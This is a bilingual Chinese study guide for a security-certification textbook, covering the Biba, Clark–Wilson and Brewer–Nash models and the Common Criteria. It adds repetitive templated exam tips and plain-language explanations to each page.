信息流,并且是一个多级模型。 事实上,Biba模型是贝尔‑拉帕杜拉模型的逆 模型。 Biba模型的特性如下: 《简单完整性属性》规定,主体不能读取完整性级别较低的对象(禁止向下读 取)。 《*(星号)完整性属性》规定,主体不能修改完整性级别较高的对象(禁 止向上写入)。 《调用属性》规定,来自低级别的进程不能请求更高级别的访问权限(既 不能读取也不能写入); 仅允许与相同或更低级别主体进行交互。 在Biba模型和Bell‑LaPadula模型中,都有两个互为逆向的属性:简 单属性和*(星号)属性。 然而,它们也可能被标记为公理、原则或规则。 您应重点关注简单和星号的命名。 请注意,简单始终涉及读取操作,而星 号始终涉及写入操作。 在这两种情况下,规则都定义了禁止或不应执行的 操作。 通常,未被阻止或禁止的行为即被允许。 因此,尽管规则以“禁止” 形式表述,其相反方向则隐含为允许。 图8.5展示了这些Biba模型属性。 图 8.5Biba 模型 考虑Biba属性。 Biba模型的第二个属性非常直接:主体不能向完整性级别更高的 对象写入。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 32 / PDF P518

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

That makes sense. What about the first property? Why can't a subject read an object at a lower integrity level? The answer takes a little thought. Think of integrity levels as being like the purity level of air. You would not want to pump air from the smoking section into the clean room environment. The same applies to data. When integrity is important, you do not want unvalidated data read into validated documents. The potential for data contamination is too great to permit such access.

中文直译 / 整理

这很合理。 那么第一个属性呢? 为什么主体不能读取完整性级别较低的对象? 答案需要稍加思考。 将完整性级别想象成空气的纯净度。 你不会希望将吸烟区 的空气泵入洁净室环境。 数据也是如此。 当完整性至关重要时,你不希望未经 验证的数据被读入已验证的文档中。 数据污染的风险过高,因此不允许此类访 问。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
学习单元 33 / PDF P519

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Memorizing the properties of Bell–LaPadula and Biba can be challenging, but there is a shortcut. If you can memorize the graphical layout in the following figure above the dotted line, then you can figure out the rest. Notice that Bell–LaPadula is placed on the left and Biba is on the right, and the security benefit of each is listed below the model name. Then, only the Bell–LaPadula model's simple property is listed. That property is “No Read Up,” which is represented by an arrow pointing upward that is crossed out and labeled by an “S” for simple and an “R” for read. From there, all of the other rules are the opposing element of the pair or inverted.

Biba requires that all subjects and objects have a classification label (it is still a DoD-derived security model). Thus, data integrity protection is dependent

中文直译 / 整理

记忆Bell–LaPadula和Biba的属性可能具有挑战性,但有一个捷径。 如 果你能记住上图虚线以上的图形布局,就可以推导出其余部分。 注意,Bell– LaPadula位于左侧,Biba位于右侧,每个模型的安全优势列在模型名称下 方。 然后,仅列出了Bell–LaPadula模型的简单属性。 该属性是“禁止向上 读取”,用一个向上指向且被划掉的箭头表示,并标有“S”(简单)和“ R”(读取)。 从此处开始,所有其他规则都是成对元素的对立面或相反形 式。 Biba 要求所有主体和对象都必须具有分类标签(它仍然是一个源自 DoD 的安全模 型)。 因此,数据完整性保护依赖于

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 34 / PDF P520

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

on data classification. Critiques of the Biba model reveal a few drawbacks: It addresses only integrity, not confidentiality or availability. It focuses on protecting objects from external threats; it assumes that internal threats are handled programmatically. It does not address access control management, and it doesn't provide a way to assign or change an object's or subject's classification level. It does not prevent covert channels. Clark–Wilson Model The Clark–Wilson model uses a multifaceted approach to enforcing data integrity.

Instead of defining a formal state machine, the Clark–Wilson model defines each data item and allows modifications through only a limited or controlled intermediary program or interface. The Clark–Wilson model does not require the use of a lattice structure; rather, it uses a three-part relationship of subject/program/object (or subject/transaction/object) known as a triple or an access control triplet. Subjects do not have direct access to objects. Objects can be accessed only through programs. Through the use of two principles—well-formed transactions and separation of duties—the Clark–Wilson model provides an effective means to protect integrity.

Well-formed transactions take the form of programs. A subject is able to access objects only by using a program, interface, or access portal (Figure 8.6). Each program has specific limitations on what it can and cannot do to an object (such as a database or other resource). This effectively limits the subject's capabilities. This is known as a constrained, limiting, or restrictive interface. If the programs are properly designed, then the triple relationship provides a means to protect the integrity of the object.

中文直译 / 整理

关于数据分类。 对Biba模型的批评揭示了几个缺点: 它仅关注完整性,而不涉及机密性或可用性。 它侧重于保护对象免受外部威胁; 它假设内部威胁已通过程序方式处理。 它未涉及访问控制管理,也没有提供分配或更改对象或主体分类级别的方式。 它无法防止隐蔽信道。 Clark–Wilson模型 该 Clark–Wilson模型 采用多方面的方法来强制执行数据完整性。 与定义形式 化的状态机不同,Clark–Wilson 模型定义了每个数据项,并仅允许通过有限 的或受控的中间程序或接口进行修改。 Clark–Wilson 模型不需要使用格结构; 相反,它使用一种三元关系:主体/ 程序/对象(或主体/事务/对象),称为三元组或 访问控制三元组。 主体不能 直接访问对象,对象只能通过程序访问。 通过使用两个原则——良好形成的事 务和职责分离——Clark–Wilson 模型提供了一种有效的手段来保护完整性。 格式良好的事务以程序的形式呈现。 主体只能通过使用程序、接口或访问门户 (图8.6)来访问对象。 每个程序都对其能够或不能对对象(如数据库或其他资 源)执行的操作有特定限制。 这有效地限制了主体的能力。

这被称为受限、限 制性或约束性接口。 如果程序设计得当,则这种三元关系提供了一种保护对象 完整性的手段。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Step-by-step、SOP 常对应 procedure。

分类由数据所有者决定,保护由保管者实施。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
程序 程序是一步一步怎么做。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 35 / PDF P521

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

FIGURE 8.6 The Clark–Wilson model Clark–Wilson defines the following items and procedures: A constrained data item (CDI) is any data item whose integrity is protected by the security model. An unconstrained data item (UDI) is any data item that is not controlled by the security model. Any data that is to be input and hasn't been validated, or any output, would be considered an unconstrained data item. An integrity verification procedure (IVP) is a procedure that scans data items and confirms their integrity. Transformation procedures (TPs) are the only procedures that are allowed to modify a CDI. The limited access to CDIs through TPs forms the backbone of the Clark–Wilson integrity model.

The Clark–Wilson model uses security labels to grant access to objects, but only through transformation procedures and a restricted interface model. A restricted interface model uses classification-based restrictions to offer only subject-specific authorized information and functions. One subject at one classification level will see one set of data and have access to one set of functions, whereas another subject at a different classification level will see a different set of data and have access to a different set of functions.

The different functions made available to different levels or classes of users may be implemented by either showing all functions to all users but deactivating those that are not authorized for a specific user or by showing only those functions granted to a specific user. Through these mechanisms, the Clark– Wilson model ensures that data is protected from unauthorized changes from any user. In effect, the Clark–Wilson model enforces separation of duties.

中文直译 / 整理

图 8.6 Clark–Wilson 模型 Clark–Wilson定义了以下项目和过程: 一个受限数据项(CDI)是指其完整性受到安全模型保护的任何数据 项。 一个不受限数据项(UDI)是指未受安全模型控制的任何数据项。 任何待 输入但未经验证的数据,或任何输出,都被视为不受限数据项。 一个完整性验证过程(IVP)是扫描数据项并确认其完整性的过程。 转换过程(TPs)是唯一被允许修改 CDI 的过程。 通过 TPs 对 CDI 的有 限访问构成了 Clark–Wilson 完整性模型的核心。 Clark–Wilson模型使用安全标签来授予对对象的访问权限,但只能通过转换过 程和受限接口模型。 受限接口模型使用基于分类的限制,仅提供特定主体授权 的信息和功能。 处于一个分类级别的一个主体将看到一组数据并访问一组功能, 而处于不同分类级别的另一个主体将看到另一组数据并访问另一组功能。 为不 同级别或类别的用户提供的不同功能可以通过以下两种方式实现:向所有用户 显示所有功能,但停用那些未授权给特定用户的功能; 或仅显示授予特定用户 的那些功能。 通过这些机制,Clark–Wilson模型确保数据免受任何用户未经授 权的更改。

实际上,Clark–Wilson模型强制执行职责分离。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
学习单元 36 / PDF P522

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

The Clark–Wilson design makes it a common model for commercial applications. The Clark–Wilson model was designed to protect integrity using the access control triplet. However, though the intermediary interface can be programmed to limit what can be done to an object by a subject, it can just as easily be programmed to limit or restrict what objects are shown to a subject. Thus, this concept can lend itself readily to protect confidentiality. In many situations, there is an intermediary program between a subject and an object. If the focus of that intermediary is to protect integrity, then it is an implementation of the Clark–Wilson model.

If it is intended to protect confidentiality, then they are benefiting from an alternate use of the intermediary program. Brewer and Nash Model The Brewer and Nash model was created to permit access controls to change dynamically based on a user's previous activity (making it a kind of state machine model as well). This model applies to a single integrated database; it seeks to create security domains that are sensitive to the notion of conflict of interest (for example, someone who works at company C who has access to proprietary data for company A should not also be allowed access to similar data for company B if those two companies compete with each other).

This model creates a class of data that defines which security domains are potentially in conflict and prevents any subject with access to one domain that belongs to a specific conflict class from accessing any other domain that belongs to the same conflict class. Metaphorically, this puts a wall around all other information in any conflict class. Thus, this model also uses the principle of data isolation within each conflict class to keep users out of potential conflict-of-interest situations (for example, management of company datasets). Because company relationships change all the time, dynamic updates to members of and definitions for conflict classes are important.

Another way of looking at or thinking of the Brewer and Nash model is of an administrator having full control access to a wide range of data in a system based on their assigned job responsibilities and work tasks. However, at the Clark–Wilson

中文直译 / 整理

设计使其成为商业应用中的常用模型。 Clark–Wilson模型旨在使用访问控制三元组来保护完整性。 然而,尽 管中介接口可以编程以限制主体对对象的操作,它同样可以轻松地编程以 限制或屏蔽主体可见的对象。 因此,这一概念非常适合用于保护机密性。 在许多情况下,主体与对象之间存在一个中介程序。 如果该中介程序的重 点是保护完整性,那么它就是Clark–Wilson模型的实现; 如果其目的是保 护机密性,那么它则是中介程序的另一种应用。 Brewer 和 Nash 模型 Brewer和Nash模型旨在允许访问控制根据用户的先前活动动态变化(使其 也成为一种状态机模型)。 该模型适用于单一集成数据库; 其目标是创建对利 益冲突敏感的安全域(例如,为公司C工作的人员若能访问公司A的专有数据, 则不应被允许访问与公司A竞争的公司B的类似数据)。 该模型定义了一类数据, 用于标识哪些安全域可能存在潜在冲突,并阻止任何已访问属于特定冲突类别 的域的主体访问同一冲突类别中的其他域。 从隐喻上讲,这在任何冲突类别的 所有其他信息周围设置了一道墙。

因此,该模型还利用每个冲突类别内的数据 隔离原则,防止用户陷入潜在的利益冲突情境(例如,公司数据集的管理)。 由于公司关系不断变化,对冲突类别成员及其定义进行动态更新至关重要。 另一种看待或理解Brewer和Nash模型的方式是,管理员根据其分配的工作职 责和任务,对系统中的大量数据拥有完全控制访问权限。 然而,在

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 37 / PDF P523

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

moment an action is taken against any data item, the administrator's access to any conflicting data items is temporarily blocked. Only data items that relate to the initial data item can be accessed during the operation. Once the task is completed, the administrator's access returns to full control. The Brewer and Nash model was sometimes known as the Chinese Wall model, but this term is deprecated. Instead, other terms of “ethical wall” and “cone of silence” have been used to describe Brewer and Nash. Disambiguating the Word “Star” in Models The term star presents a few challenges when it comes to security models.

For one thing, there is no formal security model named “Star Model.” However, both the Bell–LaPadula and the Biba models have a star property, which is discussed in their respective sections in this chapter. Although not a model, the Cloud Security Alliance (CSA) also has a STAR program. CSA's Security Trust Assurance and Risk (STAR) program focuses on improving cloud service provider (CSP) security through auditing, transparency, and integration of standards. Although not related to security, there is also Galbraith's Star Model, which helps businesses organize divisions and departments to achieve business missions and goals and adjust over time for long-term viability.

This model is based on five main areas of business administration that need to be managed, balanced, and harnessed toward the mission and goals of the organization. The five areas of Galbraith's Star Model are Strategy, Structure, Processes, Rewards, and People. Understanding how “star” is used in the context of the Bell–LaPadula and Biba models, CSA's STAR program, and Galbraith's Star Model will help you distinguish what is meant when you see the word used in different contexts. Select Controls Based on Systems Security Requirements Those who purchase information systems for certain kinds of applications— for example, national security agencies whose sensitive information may be

中文直译 / 整理

对任何数据项采取操作的瞬间,管理员对任何冲突数据项的访问将被暂时阻 止。 在操作期间,只能访问与初始数据项相关的数据项。 一旦任务完成,管 理员的访问权限将恢复为完全控制。 Brewer 和 Nash 模型有时被称为中国墙模型,但该术语已被弃用。 相反,人 们使用了“道德墙”和“沉默锥”等其他术语来描述 Brewer 和 Nash 模型。 在模型中区分单词“Star” 术语 star 在安全模型中带来了一些挑战。 一方面,并不存在名为“ Star Model”的正式安全模型。 然而,Bell–LaPadula 模型和 Biba 模型都具有一个 star property,该特性将在本章各自的章节中进行讨 论。 尽管不是一个模型,云安全联盟(CSA)也拥有 STAR 计划。 CSA 的安全 信任保证与风险(STAR)计划旨在通过审计、透明度和标准整合来提升 云服务提供商(CSP)的安全性。 尽管与安全无关,但还有加尔布雷思的星形模型,该模型有助于企业组织 部门和分支机构,以实现业务使命和目标,并随着时间推移进行调整以确 保长期可行性。 该模型基于企业行政管理中需要被管理、平衡并服务于组 织使命与目标的五个主要领域。

加尔布雷思星形模型的五个领域分别是: 战略、结构、流程、激励和人员。 理解“star”在Bell–LaPadula模型和Biba模型、CSA的STAR计划以及 Galbraith的Star模型中的用法,将有助于您区分在不同上下文中看到该词 时的含义。 根据系统安全要求选择控制措施 那些为特定类型应用采购信息系统的人——例如,其敏感信息可能

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 38 / PDF P524

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

extremely valuable (or dangerous in the wrong hands) or central banks or securities traders that have certain data that may be worth billions of dollars —often want to understand the security strengths and weaknesses of systems prior to acquisition. Such buyers are often willing to consider only systems that have been subjected to formal evaluation processes in advance and have received some kind of security rating. Often, trusted third parties are used to perform security evaluations; the most important result from such testing is their “seal of approval” that the system meets all essential criteria.

Common Criteria The Common Criteria (CC) defines various levels of testing and confirmation of systems' security capabilities. Nevertheless, it's wise to observe that even the highest CC ratings do not equate to a guarantee that such systems are completely secure or that they are entirely devoid of vulnerabilities or susceptibilities to exploit. The Common Criteria was designed as a dynamic subjective product evaluation model and replaced previous static systems, such as the U.S. Department of Defense's Trusted Computer System Evaluation Criteria (TCSEC) and the EU's Information Technology Security Evaluation Criteria (ITSEC).

A document titled “Arrangement on the Recognition of Common Criteria Certificates in the Field of Information Technology Security” was signed by representatives from government organizations in Canada, France, Germany, the United Kingdom, and the United States in 1998, making the document an international standard. Since then, 23 additional countries have signed the arrangement.

The arrangement documentation was formally adopted as a standard and published as ISO/IEC 15408:2022 and labeled as “Information security, cybersecurity and privacy protection: Evaluation criteria for IT security.” The latest versions of ISO/IEC standards are available at standards.iso.org/ittf/PubliclyAvailableStandards/index.html. The current (as of this writing) version of the Common Criteria is to be replaced with ISO/IEC WD 15408-1 (www.iso.org/standard/88134.html). This could occur in 2024.

中文直译 / 整理

极其宝贵(或落入错误手中时具有危险性)的国家安全机构,或拥有价值数十 亿美元数据的中央银行或证券交易商——通常希望在采购前了解系统的安全优 势和弱点。 此类购买者通常只考虑那些事先经过正式评估流程并获得某种安全 评级的系统。 通常,由受信任的第三方执行安全评估; 此类测试最重要的结果是其“批准标 志”,表明系统符合所有基本标准。 通用准则 通用准则(CC)定义了多种系统安全能力的测试和确认级别。 然而,值得注意 的是,即使是最高的CC评级也不能保证此类系统完全安全,或完全不存在漏洞 或易受攻击的弱点。 通用准则被设计为一种动态的主观产品评估模型,取代了 之前的静态系统,例如美国国防部的可信计算机系统评估标准(TCSEC)和欧 盟的信息技术安全评估准则(ITSEC)。 1998年,加拿大、法国、德国、英国和美国的政府组织代表签署了一份题为 《信息技术安全领域通用准则证书互认安排》的文件,使该文件成为国际标准。 此后,又有23个国家签署了该安排。 该安排文件已被正式采纳为标准,并发布 为ISO/IEC 15408:2022,命名为"信息安全、网络安全和隐私保护:信息技术 安全评估准则"。

ISO/IEC标准的最新版本可在 standards.iso.org/ittf/PubliclyAvailableStandards/index.html获取。 当前(撰写本文时)的通用准则版本将被ISO/IEC WD 15408‑1取代( www.iso.org/standard/88134.html)。 这可能发生在2024年。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

证书不是密钥本身,而是身份与公钥的可信绑定。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 39 / PDF P525

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

The objectives of the CC guidelines are as follows: To add to buyers' confidence in the security of evaluated, rated IT products To eliminate duplicate evaluations (among other things, this means that if one country, agency, or validation organization follows the CC in rating specific systems and configurations, others elsewhere need not repeat this work) To keep making security evaluations more cost-effective and efficient To make sure evaluations of IT products adhere to high and consistent standards To promote evaluation and increase the availability of evaluated, rated IT products To evaluate the functionality (what the system does) and assurance (how much can you trust the system) of the target of evaluation (TOE) The Common Criteria process is based on two key elements: protection profiles and security targets.

Protection profiles (PPs) specify the security requirements and protections for a product that is to be evaluated (the TOE), which are considered the security desires, or the “I want” of a customer. Security targets (STs) specify the claims of security from the vendor that are built into a TOE. STs are considered the implemented security measures, or the “I will provide” from the vendor. In addition to offering security targets, vendors may offer packages of additional security features. A package is an intermediate grouping of security requirement components that can be added to or removed from a TOE (like the option packages when purchasing a new vehicle).

This system of the PP and ST allows for flexibility, subjectivity, and customization of an organization's specific security functional and assurance requirements over time. An organization's PP is compared to various STs from the selected vendor's TOEs. The closest or best match is what the client purchases. The client initially selects a vendor based on published or marketed evaluation assurance levels (EALs) for currently available systems. Using Common Criteria to choose a vendor allows clients to request exactly what they need for security rather than having to use static fixed security levels. It also allows vendors more flexibility on what they design and create.

A well-defined set of Common Criteria supports subjectivity and versatility, and it automatically

中文直译 / 整理

